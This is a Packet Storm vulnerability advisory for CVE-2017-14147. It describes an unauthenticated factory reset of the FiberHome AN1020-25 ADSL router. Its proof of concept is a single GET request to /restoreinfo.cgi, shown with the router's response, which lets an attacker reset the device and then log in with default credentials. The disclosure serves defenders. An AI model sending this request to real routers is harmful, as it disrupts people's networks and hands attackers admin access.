exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FiberHome Unauthenticated ADSL Router Factory Reset

FiberHome Unauthenticated ADSL Router Factory Reset
Posted Sep 6, 2017
Authored by Ibad Shah

FiberHome suffers from an unauthenticated ADSL router factory reset vulnerability.

tags | exploit, bypass
advisories | CVE-2017-14147
SHA-256 | f551008561f7bbf94967cb06dab25dca8114151ace31bc1ba50b3bc12f82f2ea

FiberHome Unauthenticated ADSL Router Factory Reset

Change Mirror Download
Title:
====

FiberHome Unauthenticated ADSL Router Factory Reset.

Credit:
======

Name: Ibad Shah
Twitter: @BeeFaauBee09
Website: beefaaubee09.github.io


CVE:
=====

CVE-2017-14147

Date:
====

05-09-2017 (dd/mm/yyyy)

About FiberHome:
======

FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.

Products & Services:
Wireless 3G/4G broadband devices
Custom engineered technologies
Broadband devices

URL : http://www.fiberhomegroup.com/


Description:
=======

This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password.



Affected Device Model:
=============

FiberHome ADSL AN1020-25


Exploitation-Technique:
===================

Remote


Details:
=======

Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials.

1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147

Vulnerable restoreinfo.cgi



Proof Of Concept:
================

PoC :

GET /restoreinfo.cgi HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close


HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Sat, 01 Jan 2000 00:12:39 GMT
Content-Type: text/html
Connection: close

<html>
<head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<link rel=stylesheet href='stylemain.css' type='text/css'>
<link rel=stylesheet href='colors.css' type='text/css'>
<script language="javascript">
<!-- hide

function restore() {
var enblPopWin = '0';
var loc = 'main.html';
var code = 'window.top.location="' + loc + '"';

if ( enblPopWin == '1' ) {
loc = 'index.html';
code = 'location="' + loc + '"';
}

eval(code);
}

function frmLoad() {
setTimeout("restore()", 60000);
}

// done hiding -->
</script>
</head>

<body onLoad='frmLoad()'>
<blockquote>
<b>DSL Router Restore</b><br><br>
The DSL Router configuration has been restored to default settings and the
router is rebooting.<br><br>
Close the DSL Router Configuration window and wait for 2 minutes before
reopening your web browser. If necessary, reconfigure your PC's IP address to
match your new configuration.
</blockquote>
</body>
</html>



Credits:
=======

Ibad Shah, Taimooor Zafar, Owais Mehtab
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close